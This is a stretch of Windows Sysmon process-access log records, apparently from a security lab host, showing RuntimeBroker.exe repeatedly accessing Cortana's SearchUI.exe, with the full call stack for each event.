13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000012699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 